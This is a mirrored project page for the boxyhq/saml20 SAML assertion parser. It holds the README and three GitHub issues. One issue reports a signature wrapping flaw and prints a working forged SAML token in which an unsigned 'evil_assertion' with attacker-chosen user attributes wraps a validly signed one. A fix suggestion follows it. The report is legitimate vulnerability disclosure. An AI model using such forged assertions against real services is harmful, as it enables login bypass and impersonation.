Code Monkey home page Code Monkey logo

saml20's Introduction

SAML 2.0 & 1.1 Assertion Parser & Validator

Build Status

=============

boxyhq/saml20 is a fork of a fork of saml20. It now has extended functionality and diverges from the original unmaintained library. The new package is published here - https://www.npmjs.com/package/@boxyhq/saml20

Installation

$ npm install @boxyhq/saml20

Usage

[DEPRECATED] saml.parse(rawAssertion, cb)

rawAssertion is the SAML Assertion in string format.

Parses the rawAssertion without validating signature, expiration and audience. It allows you to get information from the token like the Issuer name in order to obtain the right public key to validate the token in a multi-providers scenario.

var saml = require('@boxyhq/saml20').default;

saml.parse(rawAssertion, function (err, profile) {
  // err

  var claims = profile.claims; // Array of user attributes;
  var issuer = profile.issuer; // String Issuer name.
});

saml.parseIssuer(rawAssertion)

rawAssertion is the SAML Assertion in string format.

Parses the rawAssertion without validating signature, expiration and audience. It allows you to get information from the token like the Issuer name.

const issuer = saml.parseIssuer(rawResponse);

saml.validate(rawAssertion, options, cb)

rawAssertion is the SAML Assertion in string format.

options:

  • thumbprint is the thumbprint of the trusted public key (uses the public key that comes in the assertion).
  • publicKey is the trusted public key.
  • audience (optional). If it is included audience validation will take place.
  • bypassExpiration (optional). This flag indicates expiration validation bypass (useful for testing, not recommended in production environments);

You can use either thumbprint or publicKey but you should use at least one.

var saml = require('@boxyhq/saml20').default;

var options = {
  thumbprint: '1aeabdfa4473ecc7efc5947b18436c575574baf8',
  audience: 'http://myservice.com/',
};

saml.validate(rawAssertion, options, function (err, profile) {
  // err

  var claims = profile.claims; // Array of user attributes;
  var issuer = profile.issuer; // String Issuer name.
});

or using publicKey:

var saml = require('@boxyhq/saml20').default;

var options = {
  publicKey: 'MIICDzCCAXygAwIBAgIQVWXAvbbQyI5Bc...',
  audience: 'http://myservice.com/',
};

saml.validate(rawAssertion, options, function (err, profile) {
  // err

  var claims = profile.claims; // Array of user attributes;
  var issuer = profile.issuer; // String Issuer name.
});

Tests

Configure test/lib.index.js

In order to run the tests you must configure lib.index.js with these variables:

var issuerName = 'https://your-issuer.com';
var thumbprint = '1aeabdfa4473ecc7efc5947b19436c575574baf8';
var certificate = 'MIICDzCCAXygAwIBAgIQVWXAvbbQyI5BcFe0ssmeKTAJBgU...';
var audience = 'http://your-service.com/';

You also need to include a valid and an invalid SAML 2.0 token on test/assets/invalidToken.xml and test/assets/validToken.xml`

<Assertion ID="_1308c268-38e2-4849-9957-b7babd4a0659" IssueInstant="2014-03-01T04:04:52.919Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>https://your-issuer.com/</Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /><ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256" /><ds:Reference URI="#_1308c268-38e2-4849-9957-b7babd4a0659"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" /><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256" /><ds:DigestValue>qJQjAuaj7adyLkl6m3T1oRhtYytu4bebq9JcQObZIu8=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>amPTOSqkEq5ppbCyUgGgm....</Assertion>

To run the tests use:

$ npm test

Contributing

Thanks for taking the time to contribute! Contributions are what make the open-source community such an amazing place to learn, inspire, and create. Any contributions you make will benefit everybody and are appreciated.

Please try to create bug reports that are:

  • Reproducible. Include steps to reproduce the problem.
  • Specific. Include as much detail as possible: which version, what environment, etc.
  • Unique. Do not duplicate existing opened issues.
  • Scoped to a Single Bug. One bug per report.

Community

  • Discord (For live discussion with the Community and BoxyHQ team)
  • Twitter (Get the news fast)

Reporting Security Issues

Responsible Disclosure

License

MIT

saml20's People

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar

Forkers

randalpinto quinndiggity moneybagscleary sureshkuchana dave-ledgy nicklatin0 rileyw

saml20's Issues

Error xml not parsed correctly

I was testing out the SAML Jackson Demo with express and my identity provider (Salesforce) returned an xml response that was not correctly handled and through an exception.

This is all demo data, so it is not sensitive and posting everything here.

  1. I am redirected to identify provider to log in
  2. I am redirected back to my app
  3. The response is not handled

if (assertion[0]) { throws because assertion is undefined.

image

Here is my config on the identity provider

image

Here is the raw response I got while debugging the response

<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:3000/sso/acs" ID="_fc480a2ce1ccfca5ea037230ac366c461648046513607" InResponseTo="_5da30a190be9073a53e6" IssueInstant="2022-03-23T14:41:53.607Z" Version="2.0">
   <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">https://d6g000008kx1jeag-dev-ed.my.salesforce.com</saml:Issuer>
   <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
         <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" />
         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />
         <ds:Reference URI="#_fc480a2ce1ccfca5ea037230ac366c461648046513607">
            <ds:Transforms>
               <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" />
               <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
                  <ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="ds saml samlp" />
               </ds:Transform>
            </ds:Transforms>
            <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
            <ds:DigestValue>AUjbIyf7Q2ncY8dXZOHJiHziKB8=</ds:DigestValue>
         </ds:Reference>
      </ds:SignedInfo>
      <ds:SignatureValue>ckmokmyowhi+q/hSwXFHIhcvP4OHdF4XLNOgZRUkijnu9Dnm+7bmUeWNMDC7QYxgKeCD/Bi4mYZunm/usvaZabs4ZHNhN1nRK/6OR7HJEBXq0E2dazT9JTaurSr2By77iO3jsaEbgk/4cXE1tU0eXgnypl9PhKIHuxkLdxpIE0rsyu1oER1I9ed78mPmydmnNRCgEeNyIw70cHhAJQp1TImu1bILvHfuC9Xh9lt/4wvh0YKyT4Hv3CDa7LZ4U9SpAxx3Lp0I8wc1dPmpVrT+Lck3oqOVL1vh855PGY/+dcHanudCbltA3+hK5J+MSj+LvE9KiLmL/0oDiAH8xt6iUw==</ds:SignatureValue>
      <ds:KeyInfo>
         <ds:X509Data>
            <ds:X509Certificate>MIIErDCCA5SgAwIBAgIOAXwS/tj4AAAAACIiWw4wDQYJKoZIhvcNAQELBQAwgZAxKDAmBgNVBAMMH1NlbGZTaWduZWRDZXJ0XzIzU2VwMjAyMV8xNDExMDMxGDAWBgNVBAsMDzAwRDZnMDAwMDA4S1gxajEXMBUGA1UECgwOU2FsZXNmb3JjZS5jb20xFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xCzAJBgNVBAgMAkNBMQwwCgYDVQQGEwNVU0EwHhcNMjEwOTIzMTQxMTA0WhcNMjIwOTIzMTIwMDAwWjCBkDEoMCYGA1UEAwwfU2VsZlNpZ25lZENlcnRfMjNTZXAyMDIxXzE0MTEwMzEYMBYGA1UECwwPMDBENmcwMDAwMDhLWDFqMRcwFQYDVQQKDA5TYWxlc2ZvcmNlLmNvbTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzELMAkGA1UECAwCQ0ExDDAKBgNVBAYTA1VTQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAI0nTBaVpfpiwvOxSkev4Ya8Qx3E/oyFTfnIkgpM4whqIl8XiSTTHlLCBU5q/p9xvQb5f0JvMwF+1CR4N/QDXCLGSqQAv4gQ2rGNFh75AbquTRAq9OXPzT028js788smNwOUM2DHRjBRk1qrgF/34q03IomxDNEpYQhyZvz+l7eT7FJuRLspnjAB+9ir7V4OV1+TbHlwXT2kIHlOLxEm4ReXiNx6AadJ/dKGUKb41upWBUSoXLJQWp8gCBc9I861NkeZUp0/fIZFhSHT3oTjt9gnok+n4uEpJhDVClY9nAk0Ojhyto/spGT7ADvYFJYxgE+gcuGbKQelKaocz1y26EsCAwEAAaOCAQAwgf0wHQYDVR0OBBYEFGu2HBY9dd5f3vXxcPxtULNi6r2HMA8GA1UdEwEB/wQFMAMBAf8wgcoGA1UdIwSBwjCBv4AUa7YcFj113l/e9fFw/G1Qs2LqvYehgZakgZMwgZAxKDAmBgNVBAMMH1NlbGZTaWduZWRDZXJ0XzIzU2VwMjAyMV8xNDExMDMxGDAWBgNVBAsMDzAwRDZnMDAwMDA4S1gxajEXMBUGA1UECgwOU2FsZXNmb3JjZS5jb20xFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xCzAJBgNVBAgMAkNBMQwwCgYDVQQGEwNVU0GCDgF8Ev7Y+AAAAAAiIlsOMA0GCSqGSIb3DQEBCwUAA4IBAQAYHj5lRQhAlypIRvlg9Y7O3RiVrPNnDGY5XgQL1paHcjyhjwaAYg8koDoy4jbwCC1JjuJSKvJoGE2uP+rOqNNFjJURo5ztWWD0ZtPlHB0QbRrnPSpuc3eqb2hSY2bLFurPlNXFt/b4h0nzRi80wXqfUz+YBTxlmOJcTvYy0Pmfq1CwkXpQp1GZ2H1yUXRrAT2JDr7U1DxOm913J+oMoIxFCZFNuEXRvInLEemYH1/cqJfYBviG0EqU1M2eSFp/OZO3MskMztSecpSgFxbAmakWIb6bIXHl9id2w6ZZ0OpSLP8YkQcHYnUoeWp65envajsxhYH3c0BFSTtEcurOLVYS</ds:X509Certificate>
         </ds:X509Data>
      </ds:KeyInfo>
   </ds:Signature>
   <samlp:Status>
      <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:AuthnFailed" />
   </samlp:Status>
</samlp:Response>

Here is my metadata

<?xml version="1.0" encoding="UTF-8"?><md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://d6g000008kx1jeag-dev-ed.my.salesforce.com" validUntil="2032-03-23T15:00:03.595Z" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
   <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
      <md:KeyDescriptor use="signing">
         <ds:KeyInfo>
            <ds:X509Data>
               <ds:X509Certificate>MIIErDCCA5SgAwIBAgIOAXwS/tj4AAAAACIiWw4wDQYJKoZIhvcNAQELBQAwgZAxKDAmBgNVBAMMH1NlbGZTaWduZWRDZXJ0XzIzU2VwMjAyMV8xNDExMDMxGDAWBgNVBAsMDzAwRDZnMDAwMDA4S1gxajEXMBUGA1UECgwOU2FsZXNmb3JjZS5jb20xFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xCzAJBgNVBAgMAkNBMQwwCgYDVQQGEwNVU0EwHhcNMjEwOTIzMTQxMTA0WhcNMjIwOTIzMTIwMDAwWjCBkDEoMCYGA1UEAwwfU2VsZlNpZ25lZENlcnRfMjNTZXAyMDIxXzE0MTEwMzEYMBYGA1UECwwPMDBENmcwMDAwMDhLWDFqMRcwFQYDVQQKDA5TYWxlc2ZvcmNlLmNvbTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzELMAkGA1UECAwCQ0ExDDAKBgNVBAYTA1VTQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAI0nTBaVpfpiwvOxSkev4Ya8Qx3E/oyFTfnIkgpM4whqIl8XiSTTHlLCBU5q/p9xvQb5f0JvMwF+1CR4N/QDXCLGSqQAv4gQ2rGNFh75AbquTRAq9OXPzT028js788smNwOUM2DHRjBRk1qrgF/34q03IomxDNEpYQhyZvz+l7eT7FJuRLspnjAB+9ir7V4OV1+TbHlwXT2kIHlOLxEm4ReXiNx6AadJ/dKGUKb41upWBUSoXLJQWp8gCBc9I861NkeZUp0/fIZFhSHT3oTjt9gnok+n4uEpJhDVClY9nAk0Ojhyto/spGT7ADvYFJYxgE+gcuGbKQelKaocz1y26EsCAwEAAaOCAQAwgf0wHQYDVR0OBBYEFGu2HBY9dd5f3vXxcPxtULNi6r2HMA8GA1UdEwEB/wQFMAMBAf8wgcoGA1UdIwSBwjCBv4AUa7YcFj113l/e9fFw/G1Qs2LqvYehgZakgZMwgZAxKDAmBgNVBAMMH1NlbGZTaWduZWRDZXJ0XzIzU2VwMjAyMV8xNDExMDMxGDAWBgNVBAsMDzAwRDZnMDAwMDA4S1gxajEXMBUGA1UECgwOU2FsZXNmb3JjZS5jb20xFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xCzAJBgNVBAgMAkNBMQwwCgYDVQQGEwNVU0GCDgF8Ev7Y+AAAAAAiIlsOMA0GCSqGSIb3DQEBCwUAA4IBAQAYHj5lRQhAlypIRvlg9Y7O3RiVrPNnDGY5XgQL1paHcjyhjwaAYg8koDoy4jbwCC1JjuJSKvJoGE2uP+rOqNNFjJURo5ztWWD0ZtPlHB0QbRrnPSpuc3eqb2hSY2bLFurPlNXFt/b4h0nzRi80wXqfUz+YBTxlmOJcTvYy0Pmfq1CwkXpQp1GZ2H1yUXRrAT2JDr7U1DxOm913J+oMoIxFCZFNuEXRvInLEemYH1/cqJfYBviG0EqU1M2eSFp/OZO3MskMztSecpSgFxbAmakWIb6bIXHl9id2w6ZZ0OpSLP8YkQcHYnUoeWp65envajsxhYH3c0BFSTtEcurOLVYS</ds:X509Certificate>
            </ds:X509Data>
         </ds:KeyInfo>
      </md:KeyDescriptor>
      <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>
      <md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Location="https://d6g000008kx1jeag-dev-ed.my.salesforce.com/idp/endpoint/HttpPost"/>
      <md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://d6g000008kx1jeag-dev-ed.my.salesforce.com/idp/endpoint/HttpRedirect"/>
   </md:IDPSSODescriptor>
</md:EntityDescriptor>

`&#13;` in SAML response not sanitized before validation

Summary

When validating a SAML response, if a newline in the response is &#13; instead of &#xD;, it is not sanitized and the validation fails.

Environment in which the event occurred

  • Browser: Microsoft Edge on Windows 10
  • Execution environment: Next.js application on WSL

Related Library Versions

"@boxyhq/saml20": "1.5.1"
"@boxyhq/saml-jackson": "1.26.1"
"next-auth": "4.24.7"

Detailed Situation

In the case in issue, the X509Certificate portion of the xml argument passed to the validateSignature.hasValidSignature method represented line breaks as &#13;.
This representation is not sanitized before use and therefore fails validation.

Actual response data (excerpts)

<KeyInfo><X509Data><X509Certificate>MIID2TCCAsGgAwIBAgIBAzANBgkqhkiG9w0BAQsFADBvMQswCQYDVQQGEwJKUDERMA8GA1UECAwI&#13;
SE9ra2FpZG8xFDASBgNVBAcMC1NBUFBPUk8tU0hJMSowKAYDVQQKDCFIb2trYWlkbyBFbGVjdHJp&#13;
YyBQb3dlciBDby4sIEluYy4xCzAJBgNVBAMMAmNhMCAXDTIxMDMwMzAwMzgyMVoYDzIwNTEwMjI0&#13;
MDAzODIxWjByMQswCQYDVQQGEwJKUDERMA8GA1UECAwISE9ra2FpZG8xKjAoBgNVBAoMIUhva2th&#13;
...
vs1WiMb2KXjA5d/xGzkvmxl9Ng6Ama6p3sg38AaLcB72WCNRo5PSYL3aRta5GyfaIAeohJk1Lne+&#13;
neTrBOIBI/dbYuEe9oHPr/IW9fffE4X0iGqBVMy4UzMxIM/DNEmcp7ixVm/u6ybCDbGVWBezSVFy&#13;
SBDO6kbSaR5BAQlvMoF9+3Wixyv7Q3JomUDe7nnp2JrSvh2T1+8tFQWkEa9/1JkJT3O6XrBeY8Me&#13;
n4P9U4e8TThs3VH1lBRV8T1NYUs=</X509Certificate></X509Data></KeyInfo>

Proposed Solution

By manually modifying the contents under node_modules for testing, the following adjustment was found to resolve the issue:

xml = xml.replace(/&#x(d|D);/gi, '');
  • Suggested modification:
xml = xml.replace(/(&#x(d|D);|&#13;)/gi, '');

This modification ensures that &#13; is appropriately sanitized, allowing the validation to proceed correctly.

validate is subject to signature wrapping attacks

Signature wrapping scenarios described at: https://blog.ritvn.com/testing/2018/02/16/burp-suite-saml-signature-wrapping-attack.html

How to reproduce

The following token will validate and return the attributes in the evil assertion in the profile:

<Assertion ID="evil_assertion" IssueInstant="2014-08-14T15:34:11.070Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>https://identity.kidozen.com/</Issuer><AttributeStatement><Attribute Name="http://schemas.kidozen.com/domain"><AttributeValue>badapple.com</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name"><AttributeValue>Bad Apple</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"><AttributeValue>[email protected]</AttributeValue></Attribute></AttributeStatement><Assertion ID="_01e2c88f-2d05-4696-91dc-29224ab936f4" IssueInstant="2014-08-14T15:34:11.070Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>https://identity.kidozen.com/</Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /><ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256" /><ds:Reference URI="#_01e2c88f-2d05-4696-91dc-29224ab936f4"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" /><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256" /><ds:DigestValue>nq7o8ocpDthu2hjoc+zoqmdaK30kLIL7ojcR0xu7rgo=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>Q9Qdvao8YFWwITmelJxGWNn+upMreNMVCX60JtEtddzC+lGEFRk2pDFMETsoTqvjAC5sIbaqPBKfaLusds2rqX1JhwntkJca65jSDSvA3mukidFTcK8UomsTpQczzv/PvQrx6AmIjrX5Ibt0Vs25EFd9bqBjlWF6u1EJntL4G2s=</ds:SignatureValue><KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#"><X509Data><X509Certificate>MIICDzCCAXygAwIBAgIQVWXAvbbQyI5BcFe0ssmeKTAJBgUrDgMCHQUAMB8xHTAbBgNVBAMTFGlkZW50aXR5LmtpZG96ZW4uY29tMB4XDTEyMDcwNTE4NTEzNFoXDTM5MTIzMTIzNTk1OVowHzEdMBsGA1UEAxMUaWRlbnRpdHkua2lkb3plbi5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJ1GPvzmIZ5OO5by9Qn2fsSuLIJWHfewRzgxcZ6SykzmjD4H1aGOtjUg5EFgQ/HWxa16oJ+afWa0dyeXAiLl5gas71FzgzeODL1STIuyLXFVLQvIJX/HTQU+qcMBlwsscdvVaJSYQsI3OC8Ny5GZvt1Jj2G9TzMTg2hLk5OfO1zxAgMBAAGjVDBSMFAGA1UdAQRJMEeAEDSvlNc0zNIzPd7NykB3GAWhITAfMR0wGwYDVQQDExRpZGVudGl0eS5raWRvemVuLmNvbYIQVWXAvbbQyI5BcFe0ssmeKTAJBgUrDgMCHQUAA4GBAIMmDNzL+Kl5omgxKRTgNWMSZAaMLgAo2GVnZyQ26mc3v+sNHRUJYJzdYOpU6l/P2d9YnijDz7VKfOQzsPu5lHK5s0NiKPaSb07wJBWCNe3iwuUNZg2xg/szhiNSWdq93vKJG1mmeiJSuMlMafJVqxC6K5atypwNNBKbpJEj4w5+</X509Certificate></X509Data></KeyInfo></ds:Signature><Subject><SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer" /></Subject><Conditions NotBefore="2014-08-14T15:34:11.070Z" NotOnOrAfter="2014-08-14T16:34:11.070Z"><AudienceRestriction><Audience>http://demoscope.com</Audience></AudienceRestriction></Conditions><AttributeStatement><Attribute Name="http://schemas.kidozen.com/domain"><AttributeValue>kidozen.com</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name"><AttributeValue>John Admin</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"><AttributeValue>[email protected]</AttributeValue></Attribute></AttributeStatement></Assertion></Assertion>

Fix suggestion

xml-crypto itself suggests that additional checks need to be performed to make sure that the content you use is the content that has been signed:

var elem = select(doc, "/xpath_to_interesting_element");
var uri = sig.references[0].uri; // might not be 0 - depending on the document you verify
var id = (uri[0] === '#') ? uri.substring(1) : uri;
  if (elem.getAttribute('ID') != id && elem.getAttribute('Id') != id && elem.getAttribute('id') != id)
    throw new Error('the interesting element was not the one verified by the signature')

Therefore when parsing the profile information saml20-maintained needs to check that the ID of the element used is the same returned in the signed object after calling signed.checkSignature(xml); as per:

const uri = signed.references[0].uri;
const id = (uri[0] === '#') ? uri.substring(1) : uri;

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.